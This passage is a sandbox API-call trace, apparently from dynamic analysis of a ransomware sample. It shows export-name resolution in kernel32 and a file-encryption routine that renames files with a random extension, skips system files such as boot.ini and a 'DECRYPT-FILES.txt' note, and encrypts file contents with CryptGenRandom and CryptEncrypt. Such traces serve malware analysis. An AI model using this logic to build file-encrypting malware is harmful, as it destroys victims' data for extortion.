lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.448] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.448] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.448] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.448] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.448] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.448] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.448] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.448] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.448] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.448] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.448] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.449] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.449] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.449] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.449] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.449] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.449] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.449] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.449] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.449] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.449] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.449] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.449] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.449] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.449] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.449] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.449] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.449] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.449] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.449] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.449] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.449] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.449] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.449] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.449] lstrlenA (lpString="DELETEATOM") returned 10 [0083.449] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.449] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.449] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.449] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.449] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.449] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.449] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.449] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.449] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.449] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.449] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.449] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.450] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.450] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.450] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.450] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.450] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.450] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.450] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.450] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.450] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.450] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.450] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.450] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.450] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.450] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.450] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.450] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.450] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.450] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.450] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.450] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.450] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.450] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.450] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.450] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.450] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.450] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.450] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.450] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.450] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.450] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.450] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.450] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.450] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.450] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.450] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.450] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.451] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.451] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.451] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.451] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.451] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.451] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.451] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.451] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.451] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.451] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.451] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.451] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.451] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.451] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.451] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.451] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.451] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.451] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.451] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.451] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.451] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.451] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.451] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.451] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.451] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.451] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.451] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.451] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.451] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.451] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.451] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.451] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.451] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.452] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.452] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lABSAK16Bz2byuU.pps") returned 57 [0083.452] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lABSAK16Bz2byuU.pps.QiXqj") returned 63 [0083.452] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lABSAK16Bz2byuU.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\labsak16bz2byuu.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lABSAK16Bz2byuU.pps.QiXqj" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\labsak16bz2byuu.pps.qixqj"), dwFlags=0x0) returned 1 [0083.452] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.453] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.453] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.453] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b36a060, ftCreationTime.dwHighDateTime=0x1d4cb8c, ftLastAccessTime.dwLowDateTime=0x1c8120c0, ftLastAccessTime.dwHighDateTime=0x1d4d1d9, ftLastWriteTime.dwLowDateTime=0x1c8120c0, ftLastWriteTime.dwHighDateTime=0x1d4d1d9, nFileSizeHigh=0x0, nFileSizeLow=0x13940, dwReserved0=0x0, dwReserved1=0x0, cFileName="m8CE6Ka JeFHefZE.mp4", cAlternateFileName="M8CE6K~1.MP4")) returned 1 [0083.453] lstrcmpiW (lpString1="m8CE6Ka JeFHefZE.mp4", lpString2="DECRYPT-FILES.txt") returned 1 [0083.453] lstrcmpiW (lpString1="m8CE6Ka JeFHefZE.mp4", lpString2="autorun.inf") returned 1 [0083.453] lstrcmpiW (lpString1="m8CE6Ka JeFHefZE.mp4", lpString2="boot.ini") returned 1 [0083.453] lstrcmpiW (lpString1="m8CE6Ka JeFHefZE.mp4", lpString2="desktop.ini") returned 1 [0083.453] lstrcmpiW (lpString1="m8CE6Ka JeFHefZE.mp4", lpString2="ntuser.dat") returned -1 [0083.453] lstrcmpiW (lpString1="m8CE6Ka JeFHefZE.mp4", lpString2="iconcache.db") returned 1 [0083.453] lstrcmpiW (lpString1="m8CE6Ka JeFHefZE.mp4", lpString2="bootsect.bak") returned 1 [0083.453] lstrcmpiW (lpString1="m8CE6Ka JeFHefZE.mp4", lpString2="ntuser.dat.log") returned -1 [0083.453] lstrcmpiW (lpString1="m8CE6Ka JeFHefZE.mp4", lpString2="thumbs.db") returned -1 [0083.453] lstrcmpiW (lpString1="m8CE6Ka JeFHefZE.mp4", lpString2="Bootfont.bin") returned 1 [0083.453] lstrlenW (lpString="m8CE6Ka JeFHefZE.mp4") returned 20 [0083.453] lstrcmpiW (lpString1="mp4", lpString2="lnk") returned 1 [0083.453] lstrcmpiW (lpString1="mp4", lpString2="exe") returned 1 [0083.454] lstrcmpiW (lpString1="mp4", lpString2="sys") returned -1 [0083.454] lstrcmpiW (lpString1="mp4", lpString2="dll") returned 1 [0083.454] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0083.454] lstrlenW (lpString="m8CE6Ka JeFHefZE.mp4") returned 20 [0083.454] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0083.454] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="m8CE6Ka JeFHefZE.mp4" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m8CE6Ka JeFHefZE.mp4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m8CE6Ka JeFHefZE.mp4" [0083.454] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.454] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m8CE6Ka JeFHefZE.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\m8ce6ka jefhefze.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0083.454] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=80192) returned 1 [0083.454] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0083.454] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0083.454] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0083.454] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0083.454] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.455] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0083.455] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0083.457] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.457] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0083.458] CloseHandle (hObject=0x43c) returned 1 [0083.458] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.458] WriteFile (in: hFile=0x438, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0083.459] CloseHandle (hObject=0x0) returned 0 [0083.459] CloseHandle (hObject=0x438) returned 1 [0083.459] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.459] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.459] GetTickCount () returned 0x114d559 [0083.459] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.460] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.460] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.460] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.460] lstrlenA (lpString="kernel32.dll") returned 12 [0083.460] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.460] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.460] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.460] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.460] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.460] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.460] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.460] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.461] lstrlenA (lpString="ADDATOMA") returned 8 [0083.461] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.461] lstrlenA (lpString="ADDATOMW") returned 8 [0083.461] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.461] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.461] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.461] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.461] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.461] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.461] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.461] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.461] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.461] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.461] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.461] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.461] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.461] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.461] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.461] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.461] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.461] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.461] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.461] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.461] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.461] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.461] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.461] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.461] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.461] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.461] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.461] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.461] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.461] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.461] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.461] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.462] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.462] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.462] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.462] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.462] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.462] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.462] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.462] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.462] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.462] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.462] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.462] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.462] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.462] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.462] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.462] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.462] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.462] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.462] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.462] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.462] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.462] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 